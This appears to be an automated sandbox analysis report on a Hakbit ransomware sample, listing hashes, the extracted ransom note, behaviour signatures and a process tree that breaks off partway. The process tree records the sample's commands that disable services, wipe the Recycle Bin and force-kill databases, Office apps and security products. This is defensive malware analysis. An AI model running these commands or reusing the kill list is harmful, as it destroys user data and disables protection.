hakbit | 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b

Resubmissions

11-09-2022 15:45

220911-s66x8sffap 10

21-10-2020 17:56

201021-l4bghzn2b2 10

Analysis

max time kernel
136s
max time network
152s
platform
windows10_x64
resource
win10
submitted
21-10-2020 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

Score

10^/10

hakbit ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below [email protected] Key Identifier: BlDLIs4wzgDoTYIEMMCvweBKQMXgNYDM9ggNJQgtZzjpRuLtkCHG5p7iVoU/LG9TeH623icJzMryxecZlwnGkjZNupY5CL6nC/En+NpYtGKgHgUR5ZL83odx4bFs/rF6ZxqWxrC8X9+JZ88sm/37IAb1dp9CnSae01HuaWsmD2gt/L34ysM/0bXFqMEKkmnCZFt0V1P3LpSMszf7XvRCUi/XW403bjsTv/HtW8wu/AtnvP49tu19hOuFbw8D4yhgMuD++XNq+gSl/uuewL2kBtMeZQeULo0Lpvc1AZ7GObTXObHBuvrxnrNjx3XCt9yEiLi2qkuX7wTrP+mtfvwOplEeRjffx5/oshpgrIf/AJuMOrfeHWW/SDmX4Va/e0d+800rY58aT04X6Vz39OUMh8rgB5q4IUqT8QWWv66Rh/hpjcjCqZSUFUZDZvwe1C0zChYOeSZSnl623VekCeq+YzSgwU3SdNrchIvwW4Ob/LsJ0qIeHN3mvVlyh2RH3mPdojiL6WJHEYR8oRyhC2aSvwGGYHAlrj8Hqg7+MAvCbhrOKLJE4VA2jkggkm3g3keytAlWafs0Udr/SO945dMPIigrzbrsQDvUFNTU4G0CXnsojb4wwRA9Qim8zH8OTJ6u3Bhg/Xt5VPWytqACHOK7s/PApIBsfcjeTrjhS6RHp1Y= Number of files that were processed is: 1230

Emails

[email protected]

Signatures

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ProtectWrite.tiff	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 47 IoCs

evasion

pid	Process
4560	taskkill.exe
4848	taskkill.exe
5628	taskkill.exe
3216	taskkill.exe
2584	taskkill.exe
3816	taskkill.exe
4260	taskkill.exe
4944	taskkill.exe
2532	taskkill.exe
5196	taskkill.exe
5256	taskkill.exe
1544	taskkill.exe
1892	taskkill.exe
4888	taskkill.exe
644	taskkill.exe
5564	taskkill.exe
1192	taskkill.exe
4176	taskkill.exe
4300	taskkill.exe
4696	taskkill.exe
4856	taskkill.exe
5384	taskkill.exe
5428	taskkill.exe
5588	taskkill.exe
2240	taskkill.exe
1992	taskkill.exe
5480	taskkill.exe
3352	taskkill.exe
2156	taskkill.exe
4460	taskkill.exe
4600	taskkill.exe
1236	taskkill.exe
4196	taskkill.exe
5148	taskkill.exe
5676	taskkill.exe
820	taskkill.exe
2188	taskkill.exe
4124	taskkill.exe
4532	taskkill.exe
4820	taskkill.exe
4244	taskkill.exe
4648	taskkill.exe
5524	taskkill.exe
1060	taskkill.exe
4632	taskkill.exe
5224	taskkill.exe
4400	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5964	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5960	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Token: SeDebugPrivilege	820	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	1544	taskkill.exe
Token: SeDebugPrivilege	1892	taskkill.exe
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	3216	taskkill.exe
Token: SeDebugPrivilege	3352	taskkill.exe
Token: SeDebugPrivilege	2240	taskkill.exe
Token: SeDebugPrivilege	3816	taskkill.exe
Token: SeDebugPrivilege	2188	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	4124	taskkill.exe
Token: SeDebugPrivilege	4176	taskkill.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	4400	taskkill.exe
Token: SeDebugPrivilege	4460	taskkill.exe
Token: SeDebugPrivilege	4532	taskkill.exe
Token: SeDebugPrivilege	4600	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	4696	taskkill.exe
Token: SeDebugPrivilege	4820	taskkill.exe
Token: SeDebugPrivilege	4888	taskkill.exe
Token: SeDebugPrivilege	4856	taskkill.exe
Token: SeDebugPrivilege	4944	taskkill.exe
Token: SeDebugPrivilege	2532	taskkill.exe
Token: SeDebugPrivilege	4244	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	4648	taskkill.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	4196	taskkill.exe
Token: SeDebugPrivilege	644	taskkill.exe
Token: SeDebugPrivilege	5148	taskkill.exe
Token: SeDebugPrivilege	5196	taskkill.exe
Token: SeDebugPrivilege	5224	taskkill.exe
Token: SeDebugPrivilege	5256	taskkill.exe
Token: SeDebugPrivilege	5384	taskkill.exe
Token: SeDebugPrivilege	5428	taskkill.exe
Token: SeDebugPrivilege	5480	taskkill.exe
Token: SeDebugPrivilege	5564	taskkill.exe
Token: SeDebugPrivilege	5524	taskkill.exe
Token: SeDebugPrivilege	5588	taskkill.exe
Token: SeDebugPrivilege	5628	taskkill.exe
Token: SeDebugPrivilege	5676	taskkill.exe
Token: SeDebugPrivilege	5772	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5964	notepad.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3904 wrote to memory of 3924	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	71
PID 3904 wrote to memory of 3924	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	71
PID 3904 wrote to memory of 2172	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	73
PID 3904 wrote to memory of 2172	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	73
PID 3904 wrote to memory of 3160	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	75
PID 3904 wrote to memory of 3160	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	75
PID 3904 wrote to memory of 512	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	76
PID 3904 wrote to memory of 512	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	76
PID 3904 wrote to memory of 2976	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	78
PID 3904 wrote to memory of 2976	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	78
PID 3904 wrote to memory of 820	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	80
PID 3904 wrote to memory of 820	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	80
PID 3904 wrote to memory of 1060	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	82
PID 3904 wrote to memory of 1060	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	82
PID 3904 wrote to memory of 1192	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	84
PID 3904 wrote to memory of 1192	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	84
PID 3904 wrote to memory of 1544	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	86
PID 3904 wrote to memory of 1544	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	86
PID 3904 wrote to memory of 1892	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	89
PID 3904 wrote to memory of 1892	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	89
PID 3904 wrote to memory of 2584	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 3904 wrote to memory of 2584	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 3904 wrote to memory of 3216	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	95
PID 3904 wrote to memory of 3216	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	95
PID 3904 wrote to memory of 3352	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	96
PID 3904 wrote to memory of 3352	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	96
PID 3904 wrote to memory of 2240	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	98
PID 3904 wrote to memory of 2240	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	98
PID 3904 wrote to memory of 3816	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	100
PID 3904 wrote to memory of 3816	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	100
PID 3904 wrote to memory of 2188	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	103
PID 3904 wrote to memory of 2188	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	103
PID 3904 wrote to memory of 1992	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	105
PID 3904 wrote to memory of 1992	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	105
PID 3904 wrote to memory of 2156	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	106
PID 3904 wrote to memory of 2156	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	106
PID 3904 wrote to memory of 4124	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	108
PID 3904 wrote to memory of 4124	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	108
PID 3904 wrote to memory of 4176	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	110
PID 3904 wrote to memory of 4176	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	110
PID 3904 wrote to memory of 4260	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	112
PID 3904 wrote to memory of 4260	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	112
PID 3904 wrote to memory of 4300	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	114
PID 3904 wrote to memory of 4300	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	114
PID 3904 wrote to memory of 4400	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	117
PID 3904 wrote to memory of 4400	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	117
PID 3904 wrote to memory of 4460	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	119
PID 3904 wrote to memory of 4460	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	119
PID 3904 wrote to memory of 4532	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	121
PID 3904 wrote to memory of 4532	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	121
PID 3904 wrote to memory of 4560	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	122
PID 3904 wrote to memory of 4560	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	122
PID 3904 wrote to memory of 4600	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	124
PID 3904 wrote to memory of 4600	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	124
PID 3904 wrote to memory of 4632	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	125
PID 3904 wrote to memory of 4632	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	125
PID 3904 wrote to memory of 4696	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	128
PID 3904 wrote to memory of 4696	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	128
PID 3904 wrote to memory of 4820	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	132
PID 3904 wrote to memory of 4820	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	132
PID 3904 wrote to memory of 4856	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	133
PID 3904 wrote to memory of 4856	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	133
PID 3904 wrote to memory of 4888	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	135
PID 3904 wrote to memory of 4888	3904	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	135

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3904
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:3924
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:2172
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:3160
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:512
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:2976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:820
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1544
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1892
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2584
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3352
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3816
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2188
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1992
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4124
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4300
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4400
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4460
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4532
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4560
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4600
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4632
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4696
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4820
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4856
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4888
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4944
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2532
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4244
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1236
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4848
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4196
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:644
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5148
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5196
- C:\Windows\SYSTEM32\taskkill.exe
